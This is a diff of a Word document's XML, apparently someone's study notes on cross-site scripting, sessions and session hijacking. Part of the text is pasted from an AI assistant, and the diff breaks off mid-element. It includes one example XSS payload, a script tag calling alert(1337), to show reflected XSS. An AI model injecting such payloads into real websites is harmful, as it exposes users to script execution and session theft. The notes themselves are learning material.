-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> injection technique.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>When we click on button ,we send out HTTP request. Name is sent out as GET parameter.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> After server processes information , it returns a response.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
         <w:t xml:space="preserve">Browser sees </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>whole of</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> response data as HTML</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> which is also seen by content </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>type: text</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>/html.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t xml:space="preserve">Browser can’t know without extra </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>information,</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t xml:space="preserve"> input we send is being reflected back in response.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>What if input is &lt;script&gt; alert(1337)&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This becomes reflected XSS – input reflected back in response</w:t>
-      </w:r>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>What if input is &lt;script&gt; alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1337)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This becomes reflected XSS – input </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>reflected back</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in response</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> and gets identified as script block and gets executed.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Stored XSS – input is stored in a DB, shown to user by pulling it out from where it was stored.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Can affect everyone who views the page</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> depended on your input.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">It seems you're inquiring about Cross-Site Scripting (XSS) attacks. An XSS attack is a type of security vulnerability typically found in web applications. </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>It allows attackers to inject malicious scripts into webpages viewed by other users</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>These scripts can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. XSS attacks can also be used to deface websites or redirect the user to malicious sites.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>There are three main types of XSS attacks:</w:t>
       </w:r>
     </w:p>
@@ -663,19 +2035,28 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Reflected XSS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>: The malicious script comes from the current HTTP request. It's often delivered via a link which, when clicked by an unsuspecting user, sends a request to a vulnerable website which then includes the script in the response.</w:t>
@@ -688,19 +2069,28 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>Stored XSS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>: The malicious script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.</w:t>
@@ -712,35 +2102,114 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>DOM-based XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: This type of XSS attack occurs when the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, typically in a client-side script.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: This type of XSS attack occurs when the attack payload is executed </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>as a result of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> modifying the DOM environment in the victim’s browser, typically in a client-side script.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
           <w:color w:val="8E662E"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FCEFDC"/>
         </w:rPr>
-        <w:t>It attacks the user's browser by forcing a server to transmit malicious code</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">It attacks the user's browser by forcing a server to transmit malicious </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="8E662E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FCEFDC"/>
+        </w:rPr>
+        <w:t>code</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F59E8AB" wp14:editId="21ADE638">
             <wp:extent cx="5731510" cy="1271905"/>
@@ -778,150 +2247,518 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Session</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Session – time u stay active using a website. Technique used by servers to keep track of who you are during a period of using a website. HTTP is stateless. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>While session is active every request in browser will be identified as coming from you. Otherwise every time u make a new request , you have to tell server</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Session – time u </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>stay</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> active using a website. Technique used by servers to keep track of who you are during a period of using a website. HTTP is stateless. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">While session is active every request in browser will be identified as coming from you. Otherwise every time u make a new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>request ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you have to tell server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> hey</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> it’s me again.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>This is my personal ID. This is not a good way to surf the web.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>No way server could know when you’re done with a website.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Session terminates either by you logging out or through an expiration mechanism.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">We need sessions as HTTP is stateless. Not built to keep information about users. Sessions help associate requests to other requests. Without sessions if you are on </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>facebook</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> page and want to visit profile, you would have to login again.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>When you login to website using username and password ,server may use this info along with other stuff to generate a unique id or a key and pass it back to web browser. This marks the start of session. Id is what further requests will use to authenticate you and talk to the server.</w:t>
-      </w:r>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When you login to website using username and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>password ,server</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> may use this info along with other stuff to generate a unique id or a key and pass it back to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>web browser. This marks the start of session. Id is what further requests will use to authenticate you and talk to the server.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> This is the session id.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Session hijacking – attacker fools website into thinking they are </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Session hijacking – attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>fools</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> website into thinking they are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>you and</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> then can do anything you can do on the site.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Hackers know how servers make use of session id’s to identify users</w:t>
-      </w:r>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hackers know how servers make use of session </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>id’s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to identify users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
